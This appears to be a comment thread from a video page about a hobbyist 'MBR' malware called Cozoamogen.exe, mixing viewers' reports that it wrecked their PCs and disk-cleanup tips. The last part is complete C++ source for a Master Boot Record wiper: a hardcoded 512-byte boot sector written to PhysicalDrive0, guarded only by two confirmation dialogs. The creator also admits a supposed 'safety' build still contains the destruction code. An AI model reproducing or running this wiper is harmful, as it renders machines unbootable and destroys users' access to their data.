Cozoamogen.exe (My new Malware Yet Skidded And MBR I make by myself!)

dude, that’s Holzer

The safery destroy my pc😭😭😭 i can use

HOW???

​@@Juganditux sorry... i will adjust the code

Im the second count for my coment and yes my pc has destroyed by the safery corazogen now my pc is good bit i can open someting papa but my pc is good
A cuestion
Do you fix the problem?
I you fixed thanks and i going to download the safery

@@hafsakashif2347 don't test safety i didn't remove destruction code

@@Win_malware im doin on vm

@@hafsakashif2347Aurum

ColorCs was made in C#

@@nazar7346 oh

just Delete junk files that you dont use

​@@Win_malware I have deleted junk and unnecessary files. But the disk is still full.

@@TM_DS Follow step
Step 1:Open explorer
Step 2:Go to This pc
Step 3:Select C:\ then right click at it
Step 4:Go to Properties
Step 5:Then Press "Disk Cleanup"
Step 6: if you are in disk cleanup page now click "Clean up System files" then wait for it to complete
Step 7:If completed then it will bring up disk cleanup window again
Step 8: select all file
Step 9:Press ok
Step 10: Waiting to it complete if completed you are fine
But if these step doesn't work Then it must be a VMware virtual harddisk that boot up VMs Then if you have
D:\ Recommend to move Virtual machine to D:\ or do the following step in VMware
Step 1:In vmware go edit then head to Preferences
Step 2:In preferences page now head to "Default location for virtual Machines" there will be an browse press it
Step 3:If you press it it will bring up the "Browse for Folder"
Step 4:Go to Data trying find the D:\ if you found then click at D:\ then click "Make New Folder" for example i will name it as Virtual machine if done then select it and press ok and now default location will be the VMs that Virtual machine file will created in D:\ if there any issues please tell me

@@Win_malware
Oh thank you

Include the Bootheader (Which Formed as Array)
Here the begin of MBR Overwrites
//This loads the MBR Header However this is APM.exe MBR
#include
#include
//#include
//#include
//#include
#pragma comment(lib, "winmm.lib")
#pragma comment(lib,"Msimg32.lib")
const unsigned char MasterBootRecord[] = { 0x0E, 0x1F, 0x0E, 0x07, 0x31, 0xDB, 0xB8, 0x00, 0x3F, 0xBF, 0x04, 0x7E, 0xB9, 0x00, 0x09, 0xF3,
0xAA, 0x88, 0x87, 0x04, 0x7E, 0x88, 0xA7, 0xC4, 0x7E, 0x88, 0x87, 0x85, 0x7F, 0x88, 0xA7, 0x45,
0x80, 0x88, 0x87, 0x05, 0x81, 0x88, 0xA7, 0xC5, 0x81, 0x88, 0x87, 0x86, 0x82, 0x88, 0xA7, 0x46,
0x83, 0x88, 0x87, 0x06, 0x84, 0x88, 0xA7, 0xC6, 0x84, 0x88, 0x87, 0x84, 0x85, 0x88, 0xA7, 0x44,
0x86, 0xFE, 0xCC, 0xFE, 0xC0, 0x83, 0xC3, 0x03, 0x81, 0xFB, 0xC0, 0x00, 0x7C, 0xC3, 0xB9, 0x00,
0x01, 0x9B, 0xDB, 0xE3, 0xD9, 0x06, 0x47, 0x7D, 0xDE, 0x0E, 0x4D, 0x7D, 0xD9, 0xFE, 0xDD, 0xD9,
0xD9, 0xE8, 0xD8, 0xC1, 0xDE, 0x0E, 0x4B, 0x7D, 0xDF, 0x1D, 0x47, 0xFF, 0x06, 0x4D, 0x7D, 0xE2,
0xE3, 0xB8, 0x13, 0x00, 0xCD, 0x10, 0xFA, 0xBA, 0xC4, 0x03, 0xB8, 0x04, 0x06, 0xEF, 0xB8, 0x02,
0x0F, 0xEF, 0x83, 0xC2, 0x10, 0xB8, 0x14, 0x00, 0xEF, 0xB8, 0x17, 0xE3, 0xEF, 0xB0, 0x09, 0xEE,
0x42, 0xEC, 0x24, 0xE0, 0x04, 0x07, 0xEE, 0xFB, 0xB9, 0x00, 0x01, 0xBA, 0x04, 0x7E, 0xE8, 0x90,
0x00, 0x68, 0x00, 0xA0, 0x07, 0xBA, 0xDA, 0x03, 0xEC, 0x24, 0x08, 0x75, 0xFB, 0xEC, 0x24, 0x08,
0x74, 0xFB, 0x31, 0xED, 0xA1, 0x41, 0x7D, 0xA3, 0x00, 0x7E, 0xB5, 0x32, 0xA1, 0x43, 0x7D, 0xA3,
0x02, 0x7E, 0xB1, 0x50, 0xBE, 0x00, 0x7E, 0xBB, 0x04, 0x87, 0xB4, 0x00, 0xB2, 0x04, 0xAC, 0xD7,
0x00, 0xC4, 0xFE, 0xCA, 0x75, 0xF8, 0x26, 0x88, 0x66, 0x00, 0x45, 0xFE, 0x06, 0x02, 0x7E, 0x80,
0x06, 0x03, 0x7E, 0x03, 0xFE, 0xC9, 0x75, 0xDC, 0x80, 0x06, 0x00, 0x7E, 0x02, 0xFE, 0x06, 0x01,
0x7E, 0xFE, 0xCD, 0x75, 0xC7, 0x80, 0x06, 0x41, 0x7D, 0x01, 0x80, 0x2E, 0x42, 0x7D, 0x02, 0x80,
0x06, 0x43, 0x7D, 0x03, 0x80, 0x2E, 0x44, 0x7D, 0x04, 0xE4, 0x60, 0xFE, 0xC8, 0x75, 0x96, 0x51,
0x52, 0x8B, 0x16, 0x45, 0x7D, 0x81, 0xC2, 0x00, 0x03, 0x81, 0xFA, 0x04, 0x84, 0x7E, 0x03, 0xBA,
0x04, 0x7E, 0x89, 0x16, 0x45, 0x7D, 0xB9, 0x00, 0x01, 0xE8, 0x05, 0x00, 0x5A, 0x59, 0xE9, 0x74,
0xFF, 0x06, 0x50, 0x53, 0x0E, 0x07, 0xB8, 0x12, 0x10, 0x31, 0xDB, 0xCD, 0x10, 0x5B, 0x58, 0x07,
0xC3, 0x00, 0x00, 0x00, 0x00, 0x04, 0x7E, 0xDC, 0x0F, 0xC9, 0x3C, 0x1E, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA
};
DWORD WINAPI MBRWiper(LPVOID lpParam) {
DWORD dwBytesWritten;
HANDLE hDevice = CreateFileW(
L"\\\\.\\PhysicalDrive0", GENERIC_ALL,
FILE_SHARE_READ | FILE_SHARE_WRITE, 0,
OPEN_EXISTING, 0, 0);
WriteFile(hDevice, MasterBootRecord, 512, &dwBytesWritten, 0);
return 1;
}
int CALLBACK WinMain(
HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow
)
{
if (MessageBoxW(NULL, L"Overwrite MBR?.", L"DO NOT RUN ON REAL PC!", MB_YESNO | MB_ICONEXCLAMATION) == IDNO)
{
ExitProcess(0);
}
else
{
if (MessageBoxW(NULL, L"Are you sure?", L"LAST WARNING!", MB_YESNO | MB_ICONEXCLAMATION) == IDNO)
{
ExitProcess(0);
}
else
{
CreateThread(0, 0, MBRWiper, 0, 0, 0);
}
}
}